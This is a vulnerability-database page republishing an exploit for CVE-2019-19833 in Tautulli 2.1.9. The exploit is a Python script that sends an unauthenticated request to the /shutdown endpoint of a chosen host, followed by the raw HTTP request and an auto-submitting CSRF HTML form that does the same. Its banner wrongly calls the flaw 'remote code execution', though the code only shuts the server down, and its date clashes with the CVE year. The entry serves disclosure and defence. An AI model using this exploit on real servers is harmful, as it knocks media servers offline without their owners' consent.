Vulners
Lucene search
Tautulli 2.1.9 Cross Site Request Forgery
🗓️ 17 Dec 2019 00:00:00Reported by Ismail TasdelenType 
packetstorm🔗 packetstormsecurity.com👁 96 Views
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Tautulli 2.1.9 - Denial of Service Exploit | 16 Jan 202000:00 | – | zdt |
 | Exploit for Cross-Site Request Forgery (CSRF) in Tautulli | 1 Jan 202600:39 | – | githubexploit |
 | CVE-2019-19833 | 19 Mar 202016:50 | – | circl |
 | Tautulli Cross-Site Request Forgery Vulnerability | 18 Dec 201900:00 | – | cnvd |
 | CVE-2019-19833 | 18 Dec 201917:08 | – | cve |
 | CVE-2019-19833 | 18 Dec 201917:08 | – | cvelist |
 | Tautulli 2.1.9 - Denial of Service (Metasploit) | 16 Jan 202000:00 | – | exploitdb |
 | Tautulli 2.1.9 - Denial of Service ( Metasploit ) | 16 Jan 202000:00 | – | exploitpack |
 | Tautulli v2.1.9 - Shutdown Denial of Service | 17 Jan 202010:57 | – | metasploit |
 | CVE-2019-19833 | 18 Dec 201918:15 | – | nvd |
10
`# Exploit Title: Tautulli v2.1.9 - Cross-Site Request Forgery (ShutDown)
# Date: 2018-12-17
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://tautulli.com/
# Software : https://github.com/Tautulli/Tautulli
# Product Version: v2.1.9
# Platform: Windows 10 (10.0.18362)
# Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
# Vulernability Type : Cross-Site Request Forgery (ShutDown)
# Vulenrability : Cross-Site Request Forgery
# CVE : CVE-2019-19833
# Description :
In the corresponding version of v2.1.9 by the manufacturer of Tautulli, it has
been discovered that anonymous access can be achieved in applications that do
not have a user login area and that the remote media server can be shut down.
# Python Script :
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
icon = """
_____ __ _ _ _____ _ _ _ _ _ _ _ ___ __ ___
|_ _/ \| || |_ _| || | | | | | | | \ / (_ | / |/ _ \
| || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7 |\__ /
|_||_||_|\__/ |_| \__/|___|___|_| \_/ |___\/ |_\//_/
Unauthenticated Remote Code Execution
by Ismail Tasdelen
"""
print(icon)
host = input("[+] HOST: ")
port = input("[+] PORT: ")
response = requests.get("http://" + host + ":" + port + "/" + "shutdown" ) # You can also run the restart and update_check commands.
if response.status_code == 200:
print('[✓] Success!')
elif response.status_code != 200:
print('[✗] Unsuccessful!')
else:
exit()
# HTTP GET Request :
GET /shutdown HTTP/1.1
Host: XXX.XXX.XXX.XXX:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://XXX.XXX.XXX.XXX:8181/home
Upgrade-Insecure-Requests: 1
# CSRF PoC HTML :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://XXX.XXX.XXX.XXX:8181/shutdown">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Dec 2019 00:00Current
0.9Low risk
Vulners AI Score0.9
EPSS0.56759